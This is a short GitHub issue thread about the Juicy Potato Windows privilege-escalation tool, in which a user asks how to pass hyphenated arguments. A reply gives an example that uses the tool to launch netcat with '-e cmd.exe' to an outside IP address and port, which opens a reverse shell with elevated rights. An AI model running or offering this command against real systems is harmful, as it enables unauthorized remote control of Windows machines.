### ISSUE TITLE
Unable to pass arguments which have a hifen

### ISSUE THREAD

**Issue by AstralPresence** [ohpe/juicy-potato#10]
Hey. Im trying to pass an argument like '-url XYZ' but Juicy Potato interprets it as an option, if i use quotes or tildes, the quootes and tildes get passed as an argument. Please provide a fix or instructions on how I can workarond this.

**Comment by pedroguerrap2002** [comment]
you have to do something like ./juicypotato.exe -t * -p C:\path\to\process -a "arguments, flags, etc.", for example: ./juicypotato.exe -t * -p C:\temp\nc.exe -a "-e cmd.exe 10.10.76.43 443"
